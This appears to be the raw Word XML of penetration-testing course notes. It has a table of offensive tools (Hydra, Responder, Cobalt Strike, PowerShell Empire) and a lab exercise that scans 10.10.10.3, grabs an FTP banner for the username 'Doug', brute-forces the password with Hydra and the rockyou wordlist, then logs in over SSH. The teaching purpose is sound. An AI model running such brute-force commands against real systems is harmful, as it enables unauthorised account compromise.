            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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The Metasploit Framework contains thousands of ready to go exploit modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="1290"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Network Service</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Exploitation /</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Application Exploitation</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>/ Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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exploitdb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Contains thousands of exploits. As they do not follow any particular coding standard and often written for specific environment extensive customization may be required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="742"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Credential Guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Attempt to brute force passwords</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>over a multitude of protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="669"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Credential Stealing</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>(Internal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Attempts to force windows machines issuing broadcast requests to authenticate against it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="1144"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Post Exploitation /</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Lateral Movement /</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Team Coordination / C2</w:t>
            </w:r>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Cobalt Strike</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidTr="00930238">
        <w:trPr>
          <w:trHeight w:val="535"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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Windows Lateral Movement and Persistance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2144" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Powershell Empire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>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Active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D14B6E" w:rsidRPr="009D4D6C" w:rsidRDefault="00D14B6E" w:rsidP="00930238">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D4D6C">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Packet capture, of inbound and outbound</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="009B5C11">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Penetration testing exercises CS1050 on-site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E0794" w:rsidRDefault="008E0794" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E0794" w:rsidRDefault="008E0794" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004131B1" w:rsidRDefault="00330270" w:rsidP="004131B1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exercises #1: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="004131B1" w:rsidP="004131B1">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00330270">
        <w:t>can network using zenmap (GUI version of nmap)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRPr="00244922" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244922">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">1) Quick scan:   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRPr="00244922" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244922">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2) Aggressive scan (intensive scan)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRPr="00244922" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00244922">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Find </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">how many port available, how many IP up, how many host up </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E0794" w:rsidRDefault="008E0794" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E0794" w:rsidRDefault="008E0794" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="004131B1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Exercises #2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D31324">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Scan 10.10.10.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00214721" w:rsidRDefault="00330270" w:rsidP="00214721">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>exploit – how?</w:t>
      </w:r>
      <w:r w:rsidR="00214721">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">   - </w:t>
      </w:r>
      <w:r w:rsidR="00214721">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Brute force the password </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRPr="00D31324" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="0038324D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>ftp 10.10.10.3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRPr="00C2458F" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(can connect, give you a banner saw name “Doug” – this is user name or can be “root”)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2458F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRPr="002668F0" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>&gt;c</w:t>
      </w:r>
      <w:r w:rsidRPr="002668F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>d /usr/share/wordlist/     (find rockyou.txt.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, so unzip the file</w:t>
      </w:r>
      <w:r w:rsidRPr="002668F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Brute force the password </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>&gt;Hydra  –l  “Doug”  –P  /usr/share/wordlist/</w:t>
      </w:r>
      <w:r w:rsidRPr="002668F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">   ftp://10.10.10.3</w:t>
      </w:r>
      <w:r w:rsidRPr="002668F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="00330270">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="0005226A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0005226A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Now we got Doug’s password</w:t>
      </w:r>
      <w:r w:rsidR="0005226A" w:rsidRPr="0005226A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> let’s log in to the SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005226A" w:rsidRPr="0005226A" w:rsidRDefault="0005226A" w:rsidP="0005226A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRPr="0005226A" w:rsidRDefault="0005226A" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&gt;SSH   </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="0038324D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Doug@10.10.10.3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="0005226A" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;(enter password here)</w:t>
      </w:r>
      <w:r w:rsidR="001464E0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> now we login to t</w:t>
      </w:r>
      <w:r w:rsidR="00D86B3D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>he shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC422F" w:rsidRDefault="00AC422F" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Go into shell</w:t>
      </w:r>
    </w:p>
